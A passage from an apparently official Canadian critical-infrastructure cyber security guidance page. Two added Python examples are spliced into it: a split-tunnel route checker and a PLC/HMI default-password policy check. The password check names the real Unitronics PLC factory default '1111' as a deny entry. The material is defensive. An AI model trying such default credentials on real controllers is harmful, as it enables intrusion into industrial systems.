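"""Verify that a Linux secure administrator workstation (SAW) has no split tunnel.

Added example, not Cyber Centre code. Assumptions: a route-based IPsec tunnel
whose interface (constructed name "ipsec0") appears in the main routing table,
IPv4 only, and the route listings below are constructed for the example.
"""
import ipaddress


def parse_routes(route_text):
    """Parse 'ip route show' lines into dicts with dst, via, dev, metric, scope."""
    routes = []
    for line in route_text.strip().splitlines():
        tokens = line.split()
        if not tokens:
            continue
        route = {"dst": tokens[0], "via": None, "dev": None, "metric": 0, "scope": None}
        for key in ("via", "dev", "metric", "scope"):
            if key in tokens:
                value = tokens[tokens.index(key) + 1]
                route[key] = int(value) if key == "metric" else value
        routes.append(route)
    return routes


def split_tunnel_findings(route_text, tunnel_if, vpn_gateway):
    """Return findings that show traffic can bypass the tunnel; [] means full tunnel."""
    routes = parse_routes(route_text)
    findings = []
    gateway = ipaddress.ip_address(vpn_gateway)

    # The preferred default route (lowest metric) must leave via the tunnel.
    defaults = sorted((r for r in routes if r["dst"] == "default"), key=lambda r: r["metric"])
    if not defaults:
        findings.append("no default route present")
    elif defaults[0]["dev"] != tunnel_if:
        findings.append(f"preferred default route leaves via {defaults[0]['dev']}, not {tunnel_if}")

    for r in routes:
        if r["dst"] == "default" or r["dev"] == tunnel_if:
            continue
        if r["scope"] == "link":
            continue  # directly attached subnet, needed to reach the VPN endpoint
        try:
            dst = ipaddress.ip_network(r["dst"], strict=False)
        except ValueError:
            findings.append(f"could not parse route: {r['dst']}")
            continue
        if dst.num_addresses == 1 and dst.network_address == gateway:
            continue  # host route to the VPN endpoint itself is expected
        findings.append(f"route {r['dst']} bypasses the tunnel via {r['dev']}")
    return findings


# Constructed 'ip route show' output for a SAW with a full tunnel ...
FULL_TUNNEL = """
default via 10.8.0.1 dev ipsec0 proto static metric 50
default via 192.168.1.1 dev wlan0 proto dhcp src 192.168.1.23 metric 600
10.8.0.0/24 dev ipsec0 proto kernel scope link src 10.8.0.12
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
203.0.113.10 via 192.168.1.1 dev wlan0 proto static metric 600
"""

# ... and for one where only selected networks are tunnelled (split tunnel).
SPLIT_TUNNEL = """
default via 192.168.1.1 dev wlan0 proto dhcp src 192.168.1.23 metric 600
10.8.0.0/24 dev ipsec0 proto kernel scope link src 10.8.0.12
172.16.0.0/12 via 10.8.0.1 dev ipsec0 proto static metric 50
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
198.51.100.0/24 via 192.168.1.1 dev wlan0 proto static metric 600
203.0.113.10 via 192.168.1.1 dev wlan0 proto static metric 600
"""

if __name__ == "__main__":
    for label, table in (("full", FULL_TUNNEL), ("split", SPLIT_TUNNEL)):
        print(label, split_tunnel_findings(table, "ipsec0", "203.0.113.10") or "OK")
```

<p>An empty result means every destination other than the VPN endpoint itself and the directly attached subnet is carried by the tunnel; each finding names a route the administrator should remove or justify, and the check can run as part of the workstation’s connection script so that administrative sessions are refused while a finding is present.</p>
<p>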
An <abbr title="Internet Protocol Security">IPSec</abbr> <abbr title="virtual private network">VPN</abbr> encrypts and authenticates all data in both directions and can be configured to prevent split tunneling from the <abbr title="secure administrator workstation">SAW</abbr>.</p> <p><abbr title="Transport Layer Security">TLS</abbr> <abbr title="virtual private network">VPN</abbr>s often use custom, non-standard features to tunnel traffic via <abbr title="Transport Layer Security">TLS</abbr>. <strong>Using custom or non-standard features creates additional risk exposure</strong>, even when the <abbr title="Transport Layer Security">TLS</abbr> parameters used by products are secure.</p> <p>Keep in mind that the public Internet may not be reliable in a global crisis or major disaster. As such, local administration must always be maintained as a capability in <abbr title="critical infrastructure">CI</abbr>.</p> </details><h3 class="text-info">Secure the supply chain</h3> <details><summary><h4>Vendor/supplier cyber security requirements (CRG 0.2)</h4> </summary><p>Include cyber security vendor/supplier requirements and questions in organizations’ procurement documents. Ensure those responses are evaluated such that, given two offerings of roughly similar cost and function, the more secure offering and/or supplier is preferred.</p> </details><h3 class="text-info">Prevent credential theft</h3> <details><summary><h4>Changing default passwords (CRG 2.0)</h4> </summary><p>Change default passwords and ensure your organization enforces a policy and/or process that requires changing default manufacturer passwords for all hardware, software and firmware.</p> <p>If feasible, change default passwords on Programmable Logic Controllers (PLCs) and Human Machine Interfaces (HMIs). 
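</p> <p>A policy check for the default-password requirement, as an added example that is not part of this guidance: the function below refuses a proposed <abbr title="Programmable Logic Controllers">PLC</abbr> or <abbr title="human-machine interface">HMI</abbr> password that is a documented vendor default or a trivially guessable pattern, adapting its rules to what the device can store. The only vendor default taken from this section is the Unitronics <abbr title="Programmable Logic Controllers">PLC</abbr> default “1111”; the <code>example-hmi</code> vendor and its defaults, the device profiles and the sample passwords are constructed placeholders that an operator would replace with values from vendor documentation and the asset inventory.</p>

```python
"""Reject vendor-default and trivially guessable PLC/HMI passwords.

Added example, not Cyber Centre code. The only vendor default taken from the
guidance is the Unitronics PLC default "1111"; everything else here (the
"example-hmi" vendor, its defaults, the device profiles and the sample
passwords) is a constructed placeholder to be replaced from vendor
documentation and the organization's own asset inventory.
"""
from dataclasses import dataclass

VENDOR_DEFAULTS = {
    "unitronics-vision": {"1111"},     # default named in the guidance
    "example-hmi": {"admin", "1234"},  # constructed placeholders
}


@dataclass(frozen=True)
class DeviceProfile:
    vendor_key: str     # key into VENDOR_DEFAULTS
    numeric_only: bool  # device stores only digits (constructed constraint)
    max_len: int        # longest password the device accepts


def _is_run(s):
    """True for straight ascending or descending digit runs such as 1234 or 9876."""
    if not s.isdigit() or len(s) < 3:
        return False
    diffs = {int(b) - int(a) for a, b in zip(s, s[1:])}
    return diffs in ({1}, {-1})


def _is_repeat(s):
    """True when s is one short block repeated, such as 1111, 1212 or abab."""
    for size in range(1, len(s) // 2 + 1):
        if len(s) % size == 0 and s[:size] * (len(s) // size) == s:
            return True
    return False


def password_findings(candidate, profile):
    """Return the reasons a candidate fails policy; an empty list means acceptable."""
    findings = []
    own_defaults = VENDOR_DEFAULTS.get(profile.vendor_key, set())
    all_defaults = set().union(*VENDOR_DEFAULTS.values())
    if candidate in own_defaults:
        findings.append("matches this vendor's documented default")
    elif candidate in all_defaults:
        findings.append("matches another vendor's default; still widely guessed")
    if len(candidate) > profile.max_len:
        findings.append(f"longer than the device accepts ({profile.max_len})")
    if profile.numeric_only:
        # A short numeric code is weak whatever its value, so at least use all of it.
        if not candidate.isdigit():
            findings.append("device only accepts digits")
        if len(candidate) < profile.max_len:
            findings.append("use the full length the device allows")
    else:
        if len(candidate) < 12:
            findings.append("shorter than 12 characters")
        if candidate.isdigit():
            findings.append("digits only")
    if _is_repeat(candidate):
        findings.append("repeated pattern")
    if _is_run(candidate):
        findings.append("sequential digits")
    return findings


# Constructed device profiles used in the checks below.
PLC = DeviceProfile("unitronics-vision", numeric_only=True, max_len=4)
HMI = DeviceProfile("example-hmi", numeric_only=False, max_len=64)

if __name__ == "__main__":
    for pw, dev in (("1111", PLC), ("7392", PLC), ("admin", HMI)):
        print(pw, "->", password_findings(pw, dev) or "OK")
```

<p>Run inside the procedure that issues or rotates controller credentials, a check like this gives the policy an enforceable step: a candidate with any finding is refused before it reaches the device, and the short-numeric profile makes clear that for such controllers the compensating controls in the sections below (no public Internet exposure, <abbr title="multi-factor authentication">MFA</abbr> on the remote path) carry most of the weight.</p>
<p>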
Ensure the Unitronics <abbr title="Programmable Logic Controllers">PLC</abbr> default password “1111” is not in use.<sup id="fn33a-rf"><a class="fn-lnk" href="#fn33"><span class="wb-inv">Footnote </span>33</a></sup></p> </details><details><summary><h4>Email security (CRG 2.11)</h4> </summary><p>Secure all corporate email infrastructure to reduce the risk of common email-based threats such as spoofing, phishing and interception. On all corporate email infrastructure:</p> <ul><li>enable STARTTLS</li> <li>enable Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM)</li> <li>enable Domain-based Message Authentication, Reporting and Conformance (DMARC) and set the policy to “reject”</li> <li>encrypt emails to an appropriate and approved level in accordance with the sensitivity of the email contents</li> </ul></details><details><summary><h4>Basic and <abbr title="operational technology">OT</abbr> cyber security training (CRG 2.8)</h4> </summary><p>Provide training that covers basic security and privacy concepts and foster an internal culture of security and cyber awareness. Ensure that personnel who maintain or secure <abbr title="operational technology">OT</abbr> as part of their regular duties receive <abbr title="operational technology">OT</abbr>-specific cyber security training at least annually. Training topics should include, at a minimum:</p> <ul><li>phishing</li> <li>business email compromise</li> <li>basic operational security</li> <li>password security</li> <li>privacy breaches</li> </ul></details><details><summary><h4>Disable macros by default (CRG 2.12)</h4> </summary><p>Establish a system-enforced policy that disables Microsoft Office macros or similar embedded code by default on all devices. 
If macros must be enabled in specific circumstances, set a policy that requires users to obtain authorization before macros are enabled for specific assets.</p> </details><h3 class="text-info">Protect internet-accessible vulnerable assets and services</h3> <details><summary><h4>No exploitable services on the internet (CRG 2.20)</h4> </summary><p>Do not expose exploitable services, such as Remote Desktop Protocol (RDP), to the Internet. Where services must be exposed, implement appropriate compensating controls to prevent common forms of exploitation.</p> </details><details><summary><h4>Limit <abbr title="operational technology">OT</abbr> connections to the public Internet (CRG 2.18)</h4> </summary><p>Ensure no <abbr title="operational technology">OT</abbr> assets, including <abbr title="Programmable Logic Controllers">PLC</abbr>s, are connected to the public Internet.</p> <p>In exceptional operational circumstances where remote access to the <abbr title="Programmable Logic Controllers">PLC</abbr> is required, ensure that:</p> <ul><li>exceptions are justified and documented; and</li> <li>additional protections are in place to prevent and detect exploitation attempts, such as: <ul><li>logging</li> <li><abbr title="multi-factor authentication">MFA</abbr></li> <li><abbr title="secure administrator workstation">SAW</abbr></li> <li>mandatory access via proxy or another intermediary</li> </ul></li> </ul></details><details><summary><h4>Network segmentation (CRG 2.5)</h4> </summary><p>Establish segmentation across network architecture to create boundaries and limit communication between <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> networks.</p> <p>Ensure that all connections to the <abbr title="operational technology">OT</abbr> network are denied by default unless explicitly allowed (for example, by IP address and port) for specific system functionality.</p> <p>Necessary communications paths between the <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> networks must pass through an intermediary (such as a properly configured firewall, bastion host, jump box or a demilitarized zone) that is closely monitored, captures network logs and only allows connections from approved assets.</p> </details><details><summary><h4>Mitigating known vulnerabilities (CRG 1.1)</h4> </summary><p>Apply patches for internet-facing systems within a risk-informed timespan, prioritizing the most critical assets first.</p> <p>Identify security vulnerabilities in your systems by conducting penetration tests and using automated vulnerability scanning tools, activities that are part of a comprehensive vulnerability management strategy.</p> <p>For <abbr title="operational technology">OT</abbr> assets where patching is not possible or may substantially compromise availability or safety, apply and record compensating controls (such as segmentation or monitoring). Sufficient controls either make the asset inaccessible from the public Internet or reduce the ability of threat actors to exploit the vulnerabilities in these assets.</p> </details><h3 class="text-info">Improve cyber security incident response capability</h3> <details><summary><h4>Incident response plans (CRG 1.3)</h4> </summary><p>Develop, maintain, update and regularly drill <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> cyber security incident response plans for both common and organization-specific threat scenarios and tactics, techniques and procedures (TTPs). 
Regularly test manual controls so that critical functions can keep running if <abbr title="operational technology">OT</abbr> networks need to be taken offline.</p> </details><details><summary><h4>Asset inventory and network topology (CRG 1.0)</h4> </summary><p>Maintain a regularly updated inventory of all assets within the organization’s <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> networks. Include accurate documentation of network topology and identified data assets. Immediately log any new asset that is integrated into the organization’s infrastructure.</p> </details><details><summary><h4>System backups and redundancy (CRG 2.14)</h4> </summary><p>Implement regular system backup procedures on both <abbr title="information technology">IT</abbr> and <abbr title="operational technology">OT</abbr> systems. Ensure backups are stored separately from the source systems and tested on a recurring basis.</p> <p>Ensure stored information for <abbr title="operational technology">OT</abbr> assets includes:</p> <ul><li>configurations</li> <li>roles</li> <li><abbr title="Programmable Logic Controllers">PLC</abbr> logic</li> <li>engineering drawings</li> <li>tools</li> </ul><p>Implement adequate redundancy, such as redundant network components and data storage.</p> <p>Ensure that the redundant secondary system is not co-located with the primary system and can be activated without loss of information or disruption to operations.</p> </details></div> </section> <section><h2 class="text-info page-header mrgn-tp-xl" id="9">Additional resources</h2> <p><strong>Assess:</strong></p> <ul><li><a 
href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessments">National Cyber Threat Assessments</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/baseline-cyber-threat-assessment-cybercrime">Baseline cyber threat assessment: Cybercrime</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-threat-supply-chains">The cyber threat from supply chains</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-threat-bulletin-cyber-threat-operational-technology">Cyber threat bulletin: Cyber threat to operational technology</a></li> </ul><p><strong>Prepare:</strong></p> <ul><li><a href="https://www.cyber.gc.ca/en/cyber-security-readiness/cyber-security-readiness-goals-securing-our-most-critical-systems">Cyber Security Readiness Goals: Securing Our Most Critical Systems</a></li> <li><a href="https://www.cyber.gc.ca/en/cyber-security-readiness/cross-sector-cyber-security-readiness-goals-toolkit">Cross-Sector Cyber Security Readiness Goals Toolkit</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/security-considerations-critical-infrastructure-itsap10100">Security considerations for critical infrastructure (ITSAP.10.100)</a></li> </ul><p><strong>Protect:</strong></p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/cyber-threat-bulletin-cyber-centre-reminds-canadian-critical-infrastructure-operators">Cyber threat bulletin: Cyber Centre reminds Canadian critical infrastructure operators to raise awareness and take mitigations against known Russian-backed cyber threat activity</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/joint-guidance-executives-and-leaders-critical-infrastructure-organizations-protecting-infrastructure-and-essential-functions-against-prc-cyber-activity">Joint guidance for executives and leaders of critical infrastructure organizations on protecting 
infrastructure and essential functions against <abbr title="People’s Republic of China">PRC</abbr> cyber activity</a></li> <li><a href="https://www.cyber.gc.ca/en/news-events/joint-advisory-prc-state-sponsored-actors-compromising-and-maintaining-persistent-access-us-critical-infrastructure-and-joint-guidance-identifying-and-mitigating-living-land-0">Joint advisory on <abbr title="People’s Republic of China">PRC</abbr> state-sponsored actors compromising and maintaining persistent access to U.S. critical infrastructure and joint guidance on identifying and mitigating living off the land</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/protect-your-operational-technology-itsap00051">Protect your operational technology (ITSAP.00.051)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-supply-chain-approach-assessing-risk-itsap10070">Cyber supply chain: An approach to assessing risk (ITSAP.10.070)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/protecting-your-organization-software-supply-chain-threats-itsm10071">Protecting your organization from software supply chain threats (ITSM.10.071)</a></li> </ul></section><!–FOOTNOTE SECTION EN–><aside class="wb-fnote" role="note"><h2 class="text-info" id="10">References</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>National Research Council (U.S.) Safe Drinking Water Committee. <a href="https://www.ncbi.nlm.nih.gov/books/NBK234165/">Drinking Water and Health: Volume 1. Historical Note</a>. National Academies Press. 1977.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p>City of Calgary Newsroom. <a href="https://newsroom.calgary.ca/update-2-critical-water-main-break-affecting-city-wide-water-usage/">Update June 6: Critical water main break affecting City wide water usage</a>. June 6, 2024; Matthew Lapierre. 
<a href="https://www.cbc.ca/news/canada/montreal/muhc-water-main-break-1.7261560">Services resuming at MUHC Glen site after major water main break</a>. CBC News. July 12, 2024.</p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p>Public Safety Canada. <a href="https://www.publicsafety.gc.ca/cnt/ntnl-scrt/crtcl-nfrstrctr/cci-iec-en.aspx">Canada’s Critical Infrastructure</a>. May 19, 2020.</p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>3<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 4</dt> <dd id="fn4"> <p>Public Safety Canada. <a href="https://www.publicsafety.gc.ca/cnt/rsrcs/pblctns/srtg-crtcl-nfrstrctr/index-en.aspx">National Strategy for Critical Infrastructure</a>. June 1, 2021.</p> <p class="fn-rtn"><a href="#fn4-rf"><span class="wb-inv">Return to footnote</span>4<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 5</dt> <dd id="fn5"> <p>Government of Canada. <a href="https://www.canada.ca/en/environment-climate-change/services/water-overview/governance-legislation/shared-responsibility.htm">Water governance and legislation: shared responsibility</a>. Retrieved December 1, 2024.</p> <p class="fn-rtn"><a href="#fn5-rf"><span class="wb-inv">Return to footnote</span>5<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 6</dt> <dd id="fn6"> <p>Canadian Centre for Cyber Security. <a href="https://cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2020">National Cyber Threat Assessment 2020</a>. November 16, 2020.</p> <p class="fn-rtn"><a href="#fn6-rf"><span class="wb-inv">Return to footnote</span>6<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 7</dt> <dd id="fn7"> <p>Ariel Stern, Yair Poleg. <a href="https://www.watercanada.net/feature/cyber-security-for-water-utilities/">Cyber security for water utilities</a>. Water Canada. 
August 9, 2021.</p> <p class="fn-rtn"><a href="#fn7-rf"><span class="wb-inv">Return to footnote</span>7<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 8</dt> <dd id="fn8"> <p>Kevin Johnson, Pete Perciavalle and D. Wilcoxson. <a href="https://www.stantec.com/en/ideas/spotlight/2023/chicago-red-line/time-to-invest-water-automation-how-to-tackle-5-operational-technology-challenges">How to tackle 5 operational technology challenges for water utilities</a>. May 15, 2024.</p> <p class="fn-rtn"><a href="#fn8-rf"><span class="wb-inv">Return to footnote</span>8<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 9</dt> <dd id="fn9"> <p>Magnus Arnell, Maya Miltell and Gustaf Olsson. <a href="https://www.sciencedirect.com/science/article/pii/S2589914723000063">Making waves: A vision for digital water utilities</a>. Water Research 19:7. May 1, 2023.</p> <p class="fn-rtn"><a href="#fn9-rf"><span class="wb-inv">Return to footnote</span>9<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 10</dt> <dd id="fn10"> <p>Canadian Centre for Cyber Security. <a href="https://cyber.gc.ca/en/guidance/cyber-threat-bulletin-cyber-threat-operational-technology">Cyber Threat Bulletin: The Cyber Threat to Operational Technology</a>. December 16, 2021.</p> <p class="fn-rtn"><a href="#fn10-rf"><span class="wb-inv">Return to footnote</span>10<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 11</dt> <dd id="fn11"> <p>Censys. <a href="https://censys.com/blog/research-report-internet-connected-industrial-control-systems-part-one">Research Report: Internet-Connected Industrial Control Systems</a>. August 7, 2024.</p> <p class="fn-rtn"><a href="#fn11-rf"><span class="wb-inv">Return to footnote</span>11<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 12</dt> <dd id="fn12"> <p>MITRE. 
<a href="https://www.mitre.org/news-insights/publication/malicious-control-system-cyber-security-attack-case-study-maroochy-0">Malicious Control System Cyber Security Attack Case Study: Maroochy Water Services, Australia</a>. August 1, 2008.</p> <p class="fn-rtn"><a href="#fn12-rf"><span class="wb-inv">Return to footnote</span>12<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 13</dt> <dd id="fn13"> <p>Tony Smith. <a href="https://www.theregister.com/2001/10/31/hacker_jailed_for_revenge_sewage/">Hacker jailed for revenge sewage attacks</a>. The Register. October 31, 2001.</p> <p class="fn-rtn"><a href="#fn13-rf"><span class="wb-inv">Return to footnote</span>13<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 14</dt> <dd id="fn14"> <p>Global Affairs Canada. <a href="https://www.canada.ca/en/global-affairs/news/2021/04/statement-on-solarwinds-cyber-compromise.html">Statement on SolarWinds Cyber Compromise</a>. April 15, 2021.</p> <p class="fn-rtn"><a href="#fn14-rf"><span class="wb-inv">Return to footnote</span>14<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 15</dt> <dd id="fn15"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa18-284a">Cybersecurity Advisory AA18-284A – Publicly Available Tools Seen in Cyber Incidents Worldwide</a>. June 30, 2020; Joao Marques, John Fokker and Leandro Velasco. <a href="https://www.trellix.com/blogs/research/disrupting-cobalt-strike-with-threat-intelligence/">Cracking Cobalt Strike</a>. Trellix. July 3, 2024.</p> <p class="fn-rtn"><a href="#fn15-rf"><span class="wb-inv">Return to footnote</span>15<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 16</dt> <dd id="fn16"> <p>Cybersecurity and Infrastructure Security Agency. 
<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a">Cybersecurity Advisory AA24-038A – <abbr title="People’s Republic of China">PRC</abbr> State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure</a>. February 7, 2024; Jungsoo An, Asheer Malhotra, Brandon White and Vitor Ventura. <a href="https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/">UAT-5918 targets critical infrastructure entities in Taiwan</a>. Talos. March 20, 2025; Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200a">Cybersecurity Advisory AA21-200A – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department</a>. July 20, 2021.</p> <p class="fn-rtn"><a href="#fn16-rf"><span class="wb-inv">Return to footnote</span>16<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 17</dt> <dd id="fn17"> <p>Bart Lenaerts-Bergmans. <a href="https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/living-off-the-land-attack/">What are living off the Land (LOTL) attacks?</a> CrowdStrike. February 21, 2023.</p> <p class="fn-rtn"><a href="#fn17-rf"><span class="wb-inv">Return to footnote</span>17<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 18</dt> <dd id="fn18"> <p>Microsoft Threat Intelligence. <a href="https://www.microsoft.com/en-us/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/">Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV | Microsoft Security Blog</a>. September 17, 2018.</p> <p class="fn-rtn"><a href="#fn18-rf"><span class="wb-inv">Return to footnote</span>18<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 19</dt> <dd id="fn19"> <p>Canadian Centre for Cyber Security. 
<a href="https://www.cyber.gc.ca/en/guidance/baseline-cyber-threat-assessment-cybercrime">Baseline cyber threat assessment: Cybercrime</a>. August 28, 2023.</p> <p class="fn-rtn"><a href="#fn19-rf"><span class="wb-inv">Return to footnote</span>19<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 20</dt> <dd id="fn20"> <p>Federal Bureau of Investigation Internet Crime Complaint Center. <a href="https://www.ic3.gov/AnnualReport/Reports/2023_IC3Report.pdf">Internet Crime Report 2023</a>. April 4, 2024; Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/resources-tools/resources/ransomware-threat-ot">Ransomware Threat to <abbr title="operational technology">OT</abbr></a>. June 9, 2021.</p> <p class="fn-rtn"><a href="#fn20-rf"><span class="wb-inv">Return to footnote</span>20<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 21</dt> <dd id="fn21"> <p>Trend Micro. <a href="https://newsroom.trendmicro.com/2022-06-02-Cyber-Attacks-on-Industrial-Assets-Cost-Firms-Millions">Cyber-Attacks on Industrial Assets Cost Firms Millions</a>. June 2, 2022.</p> <p class="fn-rtn"><a href="#fn21-rf"><span class="wb-inv">Return to footnote</span>21<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 22</dt> <dd id="fn22"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-287a">Cybersecurity Advisory AA21-287A – Ongoing Cyber Threats to U.S. Water and Wastewater Systems</a>. October 25, 2021; Sergiu Gatlan. <a href="https://www.bleepingcomputer.com/news/security/kansas-water-plant-cyberattack-forces-switch-to-manual-operations/">Kansas water plant cyberattack forces switch to manual operations</a>. September 24, 2024.</p> <p class="fn-rtn"><a href="#fn22-rf"><span class="wb-inv">Return to footnote</span>22<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 23</dt> <dd id="fn23"> <p>SANS Institute. 
<a href="https://www.sans.org/blog/ransomware-cases-increased-greatly-in-2023/">Ransomware Cases Increased by 73% in 2023 showing our actions have not been enough to thwart the threat</a>. January 15, 2024; Sophos. <a href="https://news.sophos.com/en-us/2024/04/30/the-state-of-ransomware-2024/">The State of Ransomware 2024</a>. April 30, 2024; Verizon. <a href="https://www.verizon.com/about/news/2023-data-breach-investigations-report">2023 Data Breach Investigations Report: frequency and cost of social engineering attacks skyrocket</a>. June 6, 2023; Fortinet. <a href="https://www.fortinet.com/content/dam/fortinet/assets/reports/report-2023-ransomware-global-research.pdf">The 2023 Global Ransomware Report</a>. April 20, 2023.</p> <p class="fn-rtn"><a href="#fn23-rf"><span class="wb-inv">Return to footnote</span>23<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 24</dt> <dd id="fn24"> <p>Canadian Centre for Cyber Security. <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a>. October 30, 2024.</p> <p class="fn-rtn"><a href="#fn24-rf"><span class="wb-inv">Return to footnote</span>24<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 25</dt> <dd id="fn25"> <p>Microsoft Threat Intelligence. <a href="https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/">Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself</a>. May 9, 2022.</p> <p class="fn-rtn"><a href="#fn25-rf"><span class="wb-inv">Return to footnote</span>25<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 26</dt> <dd id="fn26"> <p>Alicia Hope. 
<a href="https://www.cpomagazine.com/cyber-security/water-companies-veolia-north-america-and-uks-southern-water-ransomware-attack-and-data-breach-leaked-pii/">Water Companies Veolia North America and UK’s Southern Water Ransomware Attack and Data Breach Leaked PII</a>. CPO Magazine. February 2, 2024.</p> <p class="fn-rtn"><a href="#fn26-rf"><span class="wb-inv">Return to footnote</span>26<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 27</dt> <dd id="fn27"> <p>Canadian Centre for Cyber Security. <a href="https://cyber.gc.ca/en/guidance/cyber-threat-bulletin-ransomware-threat-2021">Cyber threat bulletin: The ransomware threat in 2021</a>. December 16, 2021.</p> <p class="fn-rtn"><a href="#fn27-rf"><span class="wb-inv">Return to footnote</span>27<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 28</dt> <dd id="fn28"> <p>U.S. Department of Justice. <a href="https://www.justice.gov/archives/ag/page/file/1076696/download">Report of The Attorney General’s Cyber Digital Task Force</a>. July 2, 2018; Joseph Berger. <a href="https://www.nytimes.com/2016/03/26/nyregion/rye-brook-dam-caught-in-computer-hacking-case.html">A Dam, Small and Unsung, Is Caught Up in an Iranian Hacking Case</a>. The New York Times. March 25, 2016.</p> <p class="fn-rtn"><a href="#fn28-rf"><span class="wb-inv">Return to footnote</span>28<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 29</dt> <dd id="fn29"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">Cybersecurity Advisory AA23-335A – IRGC-Affiliated Cyber Actors Exploit <abbr title="Programmable Logic Controllers">PLC</abbr>s in Multiple Sectors, Including U.S. Water and Wastewater Systems Facilities</a>. 
December 18, 2024.</p> <p class="fn-rtn"><a href="#fn29-rf"><span class="wb-inv">Return to footnote</span>29<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 30</dt> <dd id="fn30"> <p>Microsoft Security Blog. <a href="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/">Volt Typhoon targets U.S. critical infrastructure with living-off-the-land techniques</a>. May 24, 2023.</p> <p class="fn-rtn"><a href="#fn30-rf"><span class="wb-inv">Return to footnote</span>30<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 31</dt> <dd id="fn31"> <p>Cybersecurity and Infrastructure Security Agency. <a href="https://www.cisa.gov/sites/default/files/2024-05/defending-ot-operations-against-ongoing-pro-russia-hacktivist-activity-508c.pdf">Defending <abbr title="operational technology">OT</abbr> Operations against Ongoing Pro-Russia Hacktivist Activity</a>. May 1, 2024.</p> <p class="fn-rtn"><a href="#fn31-rf"><span class="wb-inv">Return to footnote</span>31<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 32</dt> <dd id="fn32"> <p>U.S. Department of the Treasury. <a href="https://home.treasury.gov/news/press-releases/jy2473">Press Release – Treasury Sanctions Leader and Primary Member of the Cyber Army of Russia Reborn</a>. July 19, 2024.</p> <p class="fn-rtn"><a href="#fn32-rf"><span class="wb-inv">Return to footnote</span>32<span class="wb-inv"> 